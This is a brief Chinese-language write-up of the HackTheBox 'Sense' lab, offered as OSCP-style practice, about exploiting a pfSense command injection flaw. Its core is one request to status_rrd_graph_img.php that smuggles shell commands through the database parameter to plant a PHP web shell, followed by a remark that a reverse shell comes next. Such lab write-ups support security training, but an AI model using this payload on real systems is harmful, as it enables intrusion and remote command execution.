0%

HackTheBox-Sense

练习,OSCP LIKE

根据这里的文章进行漏洞利用:PfSense Vulnerabilities Part 2: Command Injection

20210412-20:58:55-_yBZdhV_s7XJmO

20210412-20:59:26-_6dn2XP_yIAfmg

1
status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;echo+'<?php+echo(system($_GET[a]))?>'>a.php

20210412-21:03:23-_4xrZYe_1KDcCJ

20210412-21:02:43-_V26RQH_yfVb42

直接反弹shell即可。